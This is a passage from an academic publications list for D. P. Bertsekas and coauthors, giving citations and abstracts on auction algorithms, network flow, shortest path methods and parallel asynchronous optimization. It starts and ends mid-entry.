problem, based on a sequential shortest path augmentation approach. Each shortest path is constructed by means of the recently proposed auction/shortest path algorithm. This approach allows useful information to be passed from one shortest path construction to the next. However, the naive implementation of this approach where the length of each arc is equal to its reduced cost fails because of the presence of zero cost cycles. We overcome this difficulty by using as arc lengths $\\e$-perturbations of reduced costs and by using $\\e$-complementary slackness conditions in place of the usual complementary slackness conditions. We present several variants of the main algorithm, including one that has proved very efficient for the max-flow problem. We also discuss the possibility of combining the algorithm with the relaxation method and we provide encouraging computational results.\n\n• L. C. Polymenakos, and D. P. Bertsekas, \"Parallel Shortest Path Auction Algorithms,\" Parallel Computing, Vol. 20, pp. 1221-1247, 1994.\n\nAbstract: In this paper we discuss the parallel implementation of the auction algorithm for shortest path problems. We show that both the one-sided and the two-sided versions of the algorithm admit asynchronous implementations. We implemented the parallel schemes for the algorithm on a shared memory machine and tested its efficiency under various degrees of synchronization and for different types of problems. We discuss the efficiency of the parallel implementation of the many origins-one destination problem, the all origins-one destination problem, and the many origins-many destinations problem.\n\n• D. P. Bertsekas and P. Tseng, \"RELAX-IV: A Faster Version of the RELAX Code for Solving Minimum Cost Flow Problems,\" Report LIDS-P-2276, 1994.\n\nAbstract: The structure of dual ascent methods is particularly well-suited for taking advantage of good initial dual solutions of minimum cost flow problems. For this reason, these methods are extremely efficient for reoptimization and sensitivity analysis. In the absence of prior knowledge of a good initial dual solution, one may attempt to find such a solution by means of a heuristic initialization. RELAX-IV is a minimum cost flow code that combines the RELAX code of [BeT88a], [BeT88b] with an initialization based on a recently proposed auction/sequential shortest path algorithm. This initialization is shown to be extremely helpful in speeding up the solution of difficult problems, involving for example long augmenting paths, for which the relaxation method has been known to be slow. On the other hand, this initialization procedure does not significantly deteriorate the performance of the relaxation method for the types of problems where it has been known to be very fast.\n\n• D. P. Bertsekas, Mathematical Equivalence of the Auction Algorithm for Assignment and the Epsilon-Relaxation (Preflow-Push) Method for Min Cost Flow,\" In: Large Scale Optimization, Hager W.W., Hearn D.W., Pardalos P.M. (eds), Springer, Boston, MA.\n\nAbstract: It is well known that the linear minimum cost flow network problem can be converted to an equivalent assignment problem. We show here that when the auction algorithm is applied to this equivalent problem with some special rules for choosing the initial object prices and the person submitting a bid at each iteration, one obtains the generic form of the e-relaxation method. The reverse equivalence is already known, that is, if we view the assignment problem as a special case of a minimum cost flow problem and we apply the e-relaxation method with some special rules for choosing the node to iterate on, we obtain the auction algorithm. Thus, the two methods are mathematically equivalent.\n\n• D. P. Bertsekas, and D. A. Castanon, \"A Generic Auction Algorithm for the Minimum Cost Network Flow Problem,\" Computational Optimization and Applications, Vol. 2, 1993, pp. 229-260.\n\nAbstract: In this paper we broadly generalize the assignment auction algorithm to solve linear minimum cost network flow problems. We introduce a generic algorithm, which contains as special cases a number of known algorithms, including the e-relaxation method, and the auction algorithm for assignment and for transportation problems. The generic algorithm can serve as a broadly useful framework for the development and the complexity analysis of specialized auction algorithms that exploit the structure of particular network problems. Using this framework, we develop and analyze two new algorithms, an algorithm for general minimum cost flow problems, called network auction, and an algorithm for the k node-disjoint shortest path problem.\n\n• D. P. Bertsekas, D. A. Castanon, and H. Tsaknakis, \"Reverse Auction and the Solution of Asymmetric Assignment Problems,\" SIAM J. on Optimization, Vol. 3, 1993, pp. 268-299.\n\nAbstract: In this paper we propose auction algorithms for solving several types of assignment problems with inequality constraints. Included are asymmetric problems with different numbers of persons and objects, and multiassignment problems, where persons may be assigned to several objects and reversely. A central new idea in all these algorithms is to combine regular auction, where persons bid for objects by raising their prices, with reverse auction, where objects compete for persons by essentially offering discounts. Reverse auction can also be used to accelerate substantially (and sometimes dramatically) the convergence of regular auction for symmetric assignment problems.\n\n• D. P. Bertsekas, \"A Simple and Fast Label Correcting Algorithm for Shortest Paths,\" Networks, Vol. 23, pp. 703-709, 1993.\n\nAbstract: We propose a new method for ordering the candidate nodes in label correcting methods for shortest path problems. The method is equally simple but much faster than the D' Esopo-Pape algorithm. It is similar to the threshold algorithm in that it tries to scan nodes with small labels as early as possible, and performs comparably with that algorithm. Our algorithm can also be combined with the threshold algorithm thereby considerably improving the practical performance of both algorithms.\n\n• D. P. Bertsekas and D. A. Castanon, \"Parallel Primal-Dual Methods for the Minimum Cost Flow Problem,\" Computational Optimization and Applications, Vol. 2, pp. 317-336, 1993.\n\nAbstract: In this paper we discuss the parallel asynchronous implementation of the classical primal-dual method for solving the linear minimum cost network flow problem. Multiple augmentations and price rises are simultaneously attempted starting from several nodes with possibly outdated price and flow information. The results are then merged asynchronously subject to rather weak compatibility conditions. We show that this algorithm is valid, terminating finitely to an optimal solution. We also present computational results using an Encore Multimax that illustrate the speedup that can be obtained by parallel implementation.\n\n• D. P. Bertsekas and D. A. Castanon, \"A Forward Reverse Auction Algorithm for Asymmetric Assignment Problems,\" Report LIDS-P-2159, Lab. for Information and Decision Systems, also Computational Optimization and Applications, Vol. 1, pp. 277-297, 1992.\n\nAbstract: In this paper we consider the asymmetric assignment problem and we propose a new auction algorithm for its solution. The algorithm uses in a novel way the recently proposed idea of reverse auction, where in addition to persons bidding for objects by raising their prices, we also have objects competing for persons by essentially offering discounts. In practice, the new algorithm apparently deals better with price wars than the currently existing auction algorithms. As a result it frequently does not require $\\e$-scaling for good practical performance, and tends to terminate substantially (and often dramatically) faster than its competitors.\n\n• D. P. Bertsekas and D. A. Castanon, \"Parallel Synchronous and Asynchronous Implementations of the Auction Algorithm,\" Parallel Computing, Vol. 17, pp. 707-732, 1991.\n\nAbstract: In this paper we discuss the parallel implementation of the auction algorithm for the classical assignment problem. We show that the algorithm admits a totally asynchronous implementation and we consider several implementations on a shared memory machine, with varying degrees of synchronization. We also discuss and explore computationally the tradeoffs involved in using asynchronism to reduce the synchronization penalty.\n\n• D. P. Bertsekas, \"An Auction Algorithm for Shortest Paths,\" SIAM J. on Optimization, Vol. 1, 1991, pp. 425-447.\n\nAbstract: We propose a new and simple algorithm for finding shortest paths in a directed graph. In the single origin/single destination case, the algorithm maintains a single path starting at the origin, which is extended or contracted by a single node at each iteration. Simultaneously, at most one dual variable is adjusted at each iteration so as to either improve or maintain the value of a dual function. For the case of multiple origins, the algorithm is well suited for parallel computation. It maintains multiple paths that can be extended or contracted in parallel by several processors that share the results of their computations. Based on experiments with randomly generated problems on a serial machine, the algorithm outperforms substantially its closest competitors for problems with few origins and a single destination. It also seems better suited for parallel computation than other shortest path algorithms.\n\n• D. P. Bertsekas, \"The auction algorithm for assignment and other network flow problems: A tutorial,\" ,\" Interfaces, Vol. 20, 1990, pp.133-149.\n\nAbstract: The auction algorithm is an intuitive method for solving the classical assignment problem. It outperforms substantially its main competitors for important types of problems, both in the ory and in practice and is also naturally well suited for parallel computation. I derive the algorithm from first principles, ex plain its computational properties, and discuss its extensions to transportation and transshipment problems.\n\n• P. Tseng, D. P. Bertsekas and J. N. Tsitsiklis, \"Partially Asynchronous Algorithms for Network Flow and Other Problems,\" SIAM J. on Control and Optimization, Vol. 28, 1990, pp. 678-710.\n\nAbstract: The problem of computing a fixed point of a nonexpansive function f is considered. Sufficient conditions are provided under which a parallel, partially asynchronous implementation of the iteration x:=f(x) converges. These results are then applied to (i) quadratic programming subject to box constraints, (ii) strictly convex cost network flow optimization, (iii) an agreement and a Markov chain problem, (iv) neural network optimization, and (v) finding the least element of a polyhedral set determined by a weakly diagonally dominant, Leontief system. Finally, simulation results illustrating the attainable speedup and the effects of asynchronism are presented.\n\n• D. P. Bertsekas and D. A. Castanon, \"The Auction Algorithm for the Transportation Problem,\" Annals of Operations Research, Vol. 20, pp. 67-96, 1989.\n\nAbstract: This paper generalizes the auction algorithm to solve linear transportation problems. The idea is to convert the transportation problem into an assignment problem, and then to modify the auction algorithm to exploit the special structure of this problem. Computational results show that this modified version of the auction algorithm is very efficient for certain types of transportation problems.\n\n• D. P. Bertsekas and J. Eckstein, \"Dual Coordinate Step Methods for Linear Network Flow Problems,\" Mathematical Programming, Series B, Vol. 42, 1988, pp. 203-243.\n\nAbstract: We review a class of recently-proposed linear-cost network flow methods which are amenable to distributed implementation. All the methods in the class use the notion of epsilon-complementary slackness, and most do not explicitly manipulate any \"global\" objects such as paths, trees, or cuts. Interestingly, these methods have stimulated a large class of serial computational methods complexity results. We develop the basic theory of these methods and present two specific methods, the epsilon-relaxation algorithm for the minimum-cost flow problem, and the auction algorithm for the assignment problem. We show how to implement these methods with serial complexities of O(N^3 log NC) and O(NA log NC), respectively. We also discuss practical implementation issues and computational experience to date. Finally, we show how to implement epsilon-relaxation in a completely asynchronous, \"chaotic\" environment in which some processors compute faster than others, and there can be arbitrarily large communication delays.\n\n• D. P. Bertsekas, \"The Auction Algorithm: A Distributed Relaxation Method for the Assignment Problem,\" Annals of Operations Research, Vol. 14, 1988, pp. 105-123.\n\nAbstract: We propose a massively parallelizable algorithm for the classical assignment problem. The algorithm operates like an auction whereby unassigned persons bid simultaneously for objects thereby raising their prices. Once all bids are in, objects are awarded to the highest bidder. The algorithm can also be interpreted as a Jacobi - like relaxation method for solving a dual problem. Its (sequential) worst - case complexity, for a particular implementation that uses scaling, is O(NAlog(NC)), where N is the number of persons, A is the number of pairs of persons and objects that can be assigned to each other, and C is the maximum absolute object value. Computational results show that, for large problems, the algorithm is competitive with existing methods even without the benefit of parallelism. When executed on a parallel machine, the algorithm exhibits substantial speedup.\n\n• D. P. Bertsekas and P. Tseng, \"The relax codes for linear minimum cost network flow problems,\" Annals of Operations Research, Vol. 13, 1988, pp. 125-190.\n\nAbstract: We describe a relaxation algorithm for solving the classical minimum cost net- work flow problem. Our implementation is compared with mature state-of-the-art primal simplex and primal-dual codes and is found to be several times faster on all types of randomly generated network flow problems. Furthermore, the speed-up factor increases with problem dimension. The codes, called RELAX-II and RELAXT-II, have a facility for efficient reoptimization and sensitivity analysis, and are in the public domain.\n\n• D. P. Bertsekas and P. Tseng, \"Relaxation Methods for Minimum Cost Ordinary and Generalized Network Flow Problems,\" Operations Research Journal, Vol. 36, 1988, pp. 93-114.\n\nAbstract: We propose a new class of algorithms for linear network flow problems with and without gains. These algorithms are based on iterative improvement of a dual cost and operate in a manner that is reminiscent of coordinate ascent and Gauss-Seidel relaxation methods. we compare our coded implementations of these methods with mature state-of-the-art primal simplex and primal-dual codes,and find them to be several times faster on standard benchmark problems, and faster by an order of magnitude on large, randomly generated problems. Our experiments indicate that the speedup factor increases with problem dimension.\n\n• D. P. Bertsekas, P. A. Hosein, and P. Tseng, \"Relaxation Methods for Network Flow Problems with Convex Arc Costs,\" SIAM J. on Optimization, Vol. 25, 1987.\n\nAbstract: We consider the standard single commodity network flow problem with both linear and strictly convex possibly nondifferentiable arc costs. For the case where all arc costs are strictly convex we study the convergence of a dual Gauss-Seidel type relaxation method that is well suited for parallel computation. We then extend this method to the case where some of the arc costs are linear. As a special case we recover a relaxation method for the linear minimum cost network flow problem proposed in Bertsekas and Bertsekas and Tseng .\n\n• D. P. Bertsekas and D. ElBaz, \"Distributed Asynchronous Relaxation Algorithms for Convex Network Flow Problems,\" SIAM J. Control and Optimization, Vol. 25, 1987, pp. 74-85.\n\nAbstract: We consider the solution of the single commodity strictly convex network flow prolem in a distributed asynchronous computation environment. The dual of this problem is unconstrained, differentiable, and well suited for solution via Gauss-Seidel relaxation. We show that the structure of the dual allows the successful application of a distributed asynchronous method whereby relaxation iterations are carried out in parallel by several processors in arbitrary order and with arbitrarily large interprocessor communication delays.\n\n• D. P. Bertsekas, \"Distributed Relaxation Methods for Linear Network Flow Problems,\" Proc. of 25th CDC, Athens, Greece, 1986, pp. 2101-2106.\n\nAbstract: We consider distributed solution of the classical linear minimum cost network flow problem. We formulate a dual problem which is unconstrained, piecewise linear, and involves a dual variable for each node. We propose a dual algorithm that resembles a Gauss-Seidel relaxation method. At each iteration the dual variable of a single node is changed based on local information from adjacent nodes. In a distributed setting each node can change its variable independently of the variables of other nodes. The algorithm is efficient for some classes of problems, notably for the max-flow problem for which it resembles a recent algorithm by Goldberg .\n\n• J. N. Tsitsiklis, and D. P. Bertsekas, \"Distributed Asynchronous Optimal Routing in Data Networks,\" IEEE Trans. on Aut. Control, Vol. AC-31, 1986, pp. 325-332.\n\nAbstract: In this paper we study the performance of a class of distributed optimal routing algorithms of the gradient projection type under weaker and more realistic assumptions than those considered thus far. In particular, we show convergence to an optimal routing without assuming synchronization of computation at all nodes and measurement of link lengths at all links, while taking into account the probability of link flow transients caused by routing updates. This demonstrates the robustness of these algorithms in a realistic distributed operating environment.\n\n• D. P. Bertsekas, \"A Unified Framework for Primal-Dual Methods in Minimum Cost Network Flow Problems,\" Math. Programming, Vol. 32, pp. 125-145, 1985.\n\nAbstract: We introduce a broad class of algorithms for finding a minimum cost flow in a capacitated network. the algorithms are of the primal-dual type. They maintain primal feasibility with respect to capacity constraints, while trying to satisfy the conservation of flow equation at each node by means of a wide variety of procedures based on flow augmentation, price adjustment, and ascent of a dual functional. The manner in which these procedures are combined is flexible thereby allowing the construction of algorithms that can be tailored to the problem at hand for maximum effectiveness. Particular attention is given to methods that incorporate features from classical relaxation procedures. Experimental codes based on these methods outperform by a substantial margin the fastest available primal-dual and primal simplex codes on standard benchmark problems.\n\n• E. Gafni, and D. P. Bertsekas, \"Dynamic Control of Session Input Rates in Communication Networks,\" IEEE Trans. on Aut. Control, Vol. AC-29, 1984, pp. 1009-1016.\n\nAbstract: We consider a distributed iterative algorithm for dynamically adjusting the input rate of each session of a voice or data network using virtual circuits so as to exercise flow control. Each session origin periodically receives information regarding the level of congestion along the session path and iteratively corrects its input rate. In this paper, we place emphasis on voice networks, but the ideas involved are also relevant for dynamic flow control in data networks. The algorithm provides for the addition of new and termination of old sessions and maintains at all times feasibility of link flows with respect to capacity constraints. Fairness with respect to all sessions is built into the algorithm and a mechanism is provided to control link utilization and average delay per packet at any desired level.\n\n• D. P. Bertsekas, E. Gafni, and R. G. Gallager, \"Second Derivative Algorithms for Minimum Delay Distributed Routing in Networks,\" IEEE Trans. on Communications, Vol. COM-32, 1984 p. 911.\n\nAbstract: We propose a class of algorithms for finding an optimal quasi-static routing in a communication network. The algorithms are based on Gallager's method and provide methods for iteratively updating the routing table entries of each node in a manner that guarantees convergence to a minimum delay routing. Their main feature is that they utilize second derivatives of the objective function and may be viewed as approximations to a constrained version of Newton's method. The use of second derivatives results in improved speed of convergence and automatic stepsize scaling with respect to level of traffic input. These advantages are of crucial importance for the practical implementation of the algorithm using distributed computation in an environment where input traffic statistics gradually change.\n\n• D. P. Bertsekas and E. Gafni, \"Projected Newton Methods and Optimization of Multicommodity Flows,\" IEEE Trans. on Automatic Control, Vol. AC-28, 1983, pp. 1090-1096.\n\nAbstract: A superlinearly convergent Newton like method for linearly constrained optimization problems is adapted for solution of multicommodity network flow problems of the type arising in communication and transportation networks. We show that the method can be implemented approximately by making use of conjugate gradient iterations without the need to compute explicitly the Hessian matrix. Preliminary computational results suggest that this type of method is capable of yielding highly accurate solutions of nonlinear multicommodity flow problems far more efficiently than any of the methods available at present.\n\n• D. P. Bertsekas and E. Gafni, \"Projection Methods for Variational Inequalities with Applications to the Traffic Assignment Problem,\" Math. Progr. Studies, Vol. 17, 1982, pp. 139-159.\n\nAbstract: It is well known [2, 3, 16] that if $\\bar T:\\Rn\\mapsto\\Rn$ is a Lipschitz continuous, strongly monotone operator and $X$ is a closed convex set, then a solution $x^*\\in X$ of the variational inequality$(x-x^*)'\\bar T(x^*)\\geq 0$, for all $x\\in X$, can be found iteratively by means of the projection method $x_{k+1}=P_X[x_k-\\alpha \\bar T(x_k)]$, $x_0\\in X$, provided the stepsize $\\alpha$ is sufficiently small. We show that the same is true if $\\bar T$ is of the form $\\bar T=A'TA$ where $A:\\Rn\\mapsto\\Rm$ is a linear mapping, provided $T:\\Rm\\mapsto\\Rm$ is Lipschitz continuous and strongly monotone, and the set $X$ is polyhedral. This fact is used to construct an effective algorithm for finding a network flow which satisfies given demand constraints, and is positive only on paths of minimum delay or travel time.\n\n• D. P. Bertsekas, \"A New Algorithm for the Assignment Problem,\" Mathematical Programming, Vol. 21, pp. 152-171, 1981.\n\nAbstract: We propose a new algorithm for the classical assignment problem. The algorithm resembles in some ways the Hungarian method but differs substantially in other respects. The average computational complexity of an efficient implementation of the algorithm seems to be considerably better than the one of the Hungarian method. In a large number of randomly generated problems the algorithm has consistently outperformed an efficiently coded version of the Hungarian method by a broad margin. The factor of improvement increases with the problem dimension N and reaches an order of magnitude for N equal to several hundreds.\n\n• D. P. Bertsekas, \"A Distributed Algorithm for the Assignment Problem,\" Lab. for Information and Decision Systems Report, MIT, May 1979; a typeset version of the typewritten original.\n\nAbstract: This paper describes a new algorithm for solving the classical assignment problem. The algorithm is of a primal-dual nature and in some ways resembles the Hungarian and subgradient methods, but is substantially different in other respects. Its main feature is that it is well suited for distributed operation whereby each node participates in the computation on the basis of limited local information about the topology of the network and the data of the problem. The algorithmic process resembles an auction where economic agents compete for resources by making successively higher bids. The algorithm terminates in a finite number of iterations after resource prices reach levels where no further bidding is profitable. (This is the original paper on the auction algorithm.)\n\n• D. P. Bertsekas, \"Centralized and Distributed Newton Methods for Network Optimization and Extensions,\" Lab. for Information and Decision Systems Report LIDS-P-2866, MIT, April 2011.\n\nAbstract: We consider Newton methods for common types of single commodity and multi-commodity network flow problems. Despite the potentially very large dimension of the problem, they can be implemented using the conjugate gradient method and low-dimensional network operations, as shown nearly thirty years ago. We revisit these methods, compare them to more recent proposals, and describe how they can be implemented in a distributed computing system. We also discuss generalizations, including the treatment of arc gains, linear side constraints, and related special structures.\n\n• D. P. Bertsekas and H. Yu, \"Distributed Asynchronous Policy Iteration in Dynamic Programming,\" Proc. of 2010 Allerton Conference on Communication, Control, and Computing, Allerton Park, ILL, Sept. 2010. (Related Lecture Slides) (An extended version with additional algorithmic analysis)\n\nAbstract: We consider the distributed solution of dynamic programming (DP) problems by policy iteration. We envision a network of processors, each updating asynchronously a local policy and a local cost function, defined on a portion of the state space. The computed values are communicated asynchronously between processors and are used to perform the local policy and cost updates. The natural algorithm of this type can fail even under favorable circumstances, as shown by Williams and Baird [WiB93]. We propose an alternative and almost as simple algorithm, which converges to the optimum under the most general conditions, including asynchronous updating by multiple processors using outdated local cost functions of other processors.\n\n• D. P. Bertsekas and J. N. Tsitsiklis, \"Comment on Coordination of Groups of Mobile Autonomous Agents Using Nearest Neighbor Rules,\" Lab. for Information and Decision Systems Report, MIT, June 2006; to appear in IEEE Trans. on Aut. Control.\n\nAbstract: We clarify the relation of the model and the convergence results of Jadbabaie et al. to those studied by Bertsekas et al. [6, 5, 1]. We show that the update equations in are a very special case of those in . Furthermore, the main convergence results in are special cases of those in , except for a small difference in the connectivity assumptions which, however, does not affect the proof.\n\n• A. Nedic, D. P. Bertsekas, and V. Borkar, Distributed Asynchronous Incremental Subgradient Methods, Proceedings of the March 2000 Haifa Workshop \"Inherently Parallel Algorithms in Feasibility and Optimization and Their Applications\", D. Butnariu, Y. Censor, and S. Reich, Eds., Elsevier, Amsterdam, 2001.\n\nAbstract: We propose and analyze a distributed asynchronous subgradient method for minimizing a convex function that consists of the sum of a large number of component functions. The idea is to distribute the computation of the component subgradients among a set of processors, which communicate only with a coordinator. The coordinator performs the subgradient iteration incrementally and asynchronously, by taking steps along the subgradients of the component functions that are available at the update time. The incremental approach has performed very well in centralized computation, and the parallel implementation should improve its performance substantially, particularly for typical problems where computation of the component subgradients is relatively costly.\n\n• S. A. Savari and D. P. Bertsekas, \"Finite Termination of Asynchronous Iterative Algorithms,\" Parallel Computing, Vol. 22, 1996, pp. 39-56.\n\nAbstract: We consider $n$-processor distributed systems where the $i$th processor executes asynchronously the iteration $x_i=f_i(x)$. It is natural to terminate the iteration of the $i$th processor when some local condition, such as $x_i-f_i(x)$: small\", holds. However, local termination conditions of this type may not lead to global termination because of the asynchronous character of the algorithm. In this paper, we propose several approaches to modify the original algorithm and/or supplement it with an interprocessor communication protocol so that this difficulty does not arise.\n\n• E. A. Varvarigos and D. P. Bertsekas, \"A Conflict Sense Routing Protocol and Its Performance for Hypercubes\", IEEE Trans. Computers, Vol. 45, 1996, pp. 693-703 (copy of this paper available from the first author).\n\nAbstract: We propose a new switching format for multiprocessor networks, which we call Conflict Sense Routing Protocol. This switching format is a hybrid of packet and circuit switching, and combines advantages of both. We initially present the protocol in a way applicable to a general topology. We then present an implementation of this protocol for a hypercube computer and a particular routing algorithm. We also analyze the steady-state throughput of the hypercube implementation for random node-to-node communications.\n\n• D. P. Bertsekas, D. A. Castanon, J. Eckstein, and S. Zenios, \"Parallel Computing in Network Optimization\", Handbooks in OR & MS, (M. O. Ball, et. al, Eds.), Vol. 7, 1995, pp. 331-399.\n\n• D. P. Bertsekas, F. Guerriero and R. Musmanno, \"Parallel Shortest Path Methods for Globally Optimal Trajectories,\" High Performance Computing: Technology, Methods, and Applications, (J. Dongarra et.al., Eds.), Elsevier, 1995.\n\nAbstract: In this paper we consider a special type of trajectory optimization problem that can be viewed as a continuous-space analog of the classical shortest path problem. This problem is approached by space discretization and solution of a discretized version of the associated Hamilton-Jacobi equation. It was recently shown by Tsitsiklis that some of the ideas of classical shortest path methods, such as those underlying Dijkstra's algorithm, can be applied to solve the discretized Hamilton-Jacobi equation. In more recent work, Polymenakos, Bertsekas, and Tsitsiklis have carried this analogy further to show that some efficient label correcting methods for shortest path problems, the SLF and SLF/LLL methods of Bertsekas, can be fruitfully adapted to solve the discretized Hamilton-Jacobi equation. In this paper we discuss parallel asynchronous implementations of these methods on a shared memory multiprocessor, the Alliant FX/80. Our results show that these methods are well suited for parallelization and achieve excellent speedup.\n\n• L. C. Polymenakos, and D. P. Bertsekas, \"Parallel Shortest Path Auction Algorithms,\" Parallel Computing, Vol. 20, pp. 1221-1247, 1994.\n\nAbstract: In this paper we discuss the parallel implementation of the auction algorithm for shortest path problems. We show that both the one-sided and the two-sided versions of the algorithm admit asynchronous implementations. We implemented the parallel schemes for the algorithm on a shared memory machine and tested its efficiency under various degrees of synchronization and for different types of problems. We discuss the efficiency of the parallel implementation of the many origins-one destination problem, the all origins-one destination problem, and the many origins-many destinations problem.\n\n• E. A. Varvarigos and D. P. Bertsekas, \"Multinode Broadcast in Hypercubes and Rings with Randomly Distributed Length of Packets,\" IEEE Transactions on Parallel and Distributed Systems, Vol. 4, pp. 144-154, 1993.\n\nAbstract: We consider a multinode broadcast (MNB) in a hypercube and in a ring network of processors. This is the communication task where we want each node of the network to broadcast a packet to all the other nodes. The communication model that we use is different than those considered in the literature so far. In particular, we assume that the lengths of the packets that are broadcast are not fixed, but are distributed according to some probabilistic rule, and we compare the optimal times required to execute the MNB for variable and for fixed packet lengths.\n\n• D. P. Bertsekas and D. A. Castanon, \"Parallel Asynchronous Hungarian Methods for the Assignment Problem,\" ORSA J. on Computing, Vol. 5, pp. 261-274, 1993.\n\nAbstract: In this paper we discuss the parallel asynchronous implementation of the Hungarian method for solving the classical assignment problem. Multiple augmentations and price rises are simultaneously attempted starting from several unassigned sources and using possibly outdated price and assignment information. The results are then merged asynchronously subject to rather weak compatibility conditions. We show the validity of this algorithm and we demonstrate computationally that an asynchronous implementation is often faster than its synchronous counterpart.\n\n• D. P. Bertsekas and D. A. Castanon, \"Parallel Primal-Dual Methods for the Minimum Cost Flow Problem,\" Computational Optimization and Applications, Vol. 2, pp. 317-336, 1993.\n\nAbstract: In this paper we discuss the parallel asynchronous implementation of the classical primal-dual method for solving the linear minimum cost network flow problem. Multiple augmentations and price rises are simultaneously attempted starting from several nodes with possibly outdated price and flow information. The results are then merged asynchronously subject to rather weak compatibility conditions. We show that this algorithm is valid, terminating finitely to an optimal solution. We also present computational results using an Encore Multimax that illustrate the speedup that can be obtained by parallel implementation.\n\n• D. P. Bertsekas and D. A. Castanon, \"Parallel Synchronous and Asynchronous Implementations of the Auction Algorithm,\" Parallel Computing, Vol. 17, 1991, pp. 707-732.\n\nAbstract: In this paper we discuss the parallel implementation of the auction algorithm for the classical assignment problem. We show that the algorithm admits a totally asynchronous implementation and we consider several implementations on a shared memory machine, with varying degrees of synchronization. We also discuss and explore computationally the tradeoffs involved in using asynchronism to reduce the synchronization penalty.\n\n• D. P. Bertsekas, and J. N. Tsitsiklis, \"Some Aspects of Parallel and Distributed Iterative Algorithms - A Survey,\" Automatica, Vol. 27, 1991, pp. 3-21.\n\nAbstract: We consider iterative algorithms of the form x:=f(x), executed by a parallel or distributed computing system. We first consider synchronous executions of such iterations and study their communication requirements, as well as issues related to processor synchronization. We also discuss the parallelization of iterations of the Gauss-Seidel type. We then consider asynchronous implementations whereby each processor iterates on a different component of x, at its own pace, using the most recently received (but possibly outdated) information on the remaining components of x. While certain algorithms may fail to converge when implemented asynchronously, a large number of positive convergence results is available. We classify asynchronous algorithms into three main categories, depending on the amount of asynchronism they can tolerate, and survey the corresponding convergence results. We also discuss issues related to their termination.\n\n• D. P. Bertsekas, C. Ozveren, G. D. Stamoulis, P. Tseng, and J. N. Tsitsiklis, \"Optimal Communication Algorithms for Hypercubes,\" J. of Parallel and Distributed Computing, Vol. 11, 1991, pp. 263-275.\n\nAbstract: We consider the following basic communication problems in a hypercube network of processors: the problem of a single processor sending a different packet to each of the other processors, the problem of simultaneous broadcast of the same packet from every processor to all other processors, and the problem of simultaneous exchange of different packets between every pair of processors. The algorithms proposed for these problems are optimal in terms of execution time and communication resource requirements; that is, they require the minimum possible number of time steps and packet transmissions. In contrast, algorithms in the literature are optimal only within an additive or multiplicative factor.\n\n• P. Tseng, D. P. Bertsekas and J. N. Tsitsiklis, \"Partially Asynchronous Algorithms for Network Flow and Other Problems,\" SIAM J. on Control and Optimization, Vol. 28, 1990, pp. 678-710.\n\nAbstract: The problem of computing a fixed point of a nonexpansive function f is considered. Sufficient conditions are provided under which a parallel, partially asynchronous implementation of the iteration x:=f(x) converges. These results are then applied to (i) quadratic programming subject to box constraints, (ii) strictly convex cost network flow optimization, (iii) an agreement and a Markov chain problem, (iv) neural network optimization, and (v) finding the least element of a polyhedral set determined by a weakly diagonally dominant, Leontief system. Finally, simulation results illustrating the attainable speedup and the effects of asynchronism are presented.\n\n• D. P. Bertsekas and J. N. Tsitsiklis, \"Convergence Rate and Termination of Asynchronous Iterative Algorithms\", Proceedings of the 1989 International Conference on Supercomputing, Crete, Greece, pp. 461-470, June 1989.\n\nAbstract: We consider iterative algorithms of the form z := f(z), executed by a parallel or distributed computing system. We focus on asynchronous implementations whereby each processor iterates on a different component of z, at its own pace, using the most recently received (but possibly outdated) information on the remaining components of 2. We provide results on the convergence rate of such algorithms and make a comparison with the convergence rate of the corresponding synchronous methods in which the computation proceeds in phases. We also present results on how to terminate asynchronous iterations in finite time with an approximate solution of the computational problem under consideration.\n\n• D. P. Bertsekas and J. Eckstein, \"Dual Coordinate Step Methods for Linear Network Flow Problems,\" Mathematical Programming, Series B, Vol. 42, 1988, pp. 203-243.\n\nAbstract: We review a class of recently-proposed linear-cost network flow methods which are amenable to distributed implementation. All the methods in the class use the notion of epsilon-complementary slackness, and most do not explicitly manipulate any \"global\" objects such as paths, trees, or cuts. Interestingly, these methods have stimulated a large class of serial computational methods complexity results. We develop the basic theory of these methods and present two specific methods, the epsilon-relaxation algorithm for the minimum-cost flow problem, and the auction algorithm for the assignment problem. We show how to implement these methods with serial complexities of O(N^3 log NC) and O(NA log NC), respectively. We also discuss practical implementation issues and computational experience to date. Finally, we show how to implement epsilon-relaxation in a completely asynchronous, \"chaotic\" environment in which some processors compute faster than others, and there can be arbitrarily large communication delays.\n\n• D. P. Bertsekas, P. A. Hosein, and P. Tseng, \"Relaxation Methods for Network Flow Problems with Convex Arc Costs,\" SIAM J. on Optimization, Vol. 25, 1987.\n\nAbstract: We consider the standard single commodity network flow problem with both linear and strictly convex possibly nondifferentiable arc costs. For the case where all arc costs are strictly convex we study the convergence of a dual Gauss-Seidel type relaxation method that is well suited for parallel computation. We then extend this method to the case where some of the arc costs are linear. As a special case we recover a relaxation method for the linear minimum cost network flow problem proposed in Bertsekas and Bertsekas and Tseng .\n\n• D. P. Bertsekas and D. ElBaz, \"Distributed Asynchronous Relaxation Algorithms for Convex Network Flow Problems,\" SIAM J. Control and Optimization, Vol. 25, 1987, pp. 74-85.\n\nAbstract: We consider the solution of the single commodity strictly convex network flow prolem in a distributed asynchronous computation environment. The dual of this problem is unconstrained, differentiable, and well suited for solution via Gauss-Seidel relaxation. We show that the structure of the dual allows the successful application of a distributed asynchronous method whereby relaxation iterations are carried out in parallel by several processors in arbitrary order and with arbitrarily large interprocessor communication delays.\n\n• D. P. Bertsekas, \"Distributed Relaxation Methods for Linear Network Flow Problems,\" Proc. of 25th CDC, Athens, Greece, 1986, pp. 2101-2106.\n\nAbstract: We consider distributed solution of the classical linear minimum cost network flow problem. We formulate a dual problem which is unconstrained, piecewise linear, and involves a dual variable for each node. We propose a dual algorithm that resembles a Gauss-Seidel relaxation method. At each iteration the dual variable of a single node is changed based on local information from adjacent nodes. In a distributed setting each node can change its variable independently of the variables of other nodes. The algorithm is efficient for some classes of problems, notably for the max-flow problem for which it resembles a recent algorithm by Goldberg .\n\n• J. N. Tsitsiklis, and D. P. Bertsekas, \"Distributed Asynchronous Optimal Routing in Data Networks,\" IEEE Trans. on Aut. Control, Vol. AC-31, 1986, pp. 325-332.\n\nAbstract: In this paper we study the performance of a class of distributed optimal routing algorithms of the gradient projection type under weaker and more realistic assumptions than those considered thus far. In particular, we show convergence to an optimal routing without assuming synchronization of computation at all nodes and measurement of link lengths at all links, while taking into account the probability of link flow transients caused by routing updates. This demonstrates the robustness of these algorithms in a realistic distributed operating environment.\n\n• J. N. Tsitsiklis, D. P. Bertsekas, and M. Athans, \"Distributed Asynchronous Deterministic and Stochastic Gradient Optimization Algorithms,\" IEEE Trans. on Aut. Control, Vol. AC-31, 1986, pp. 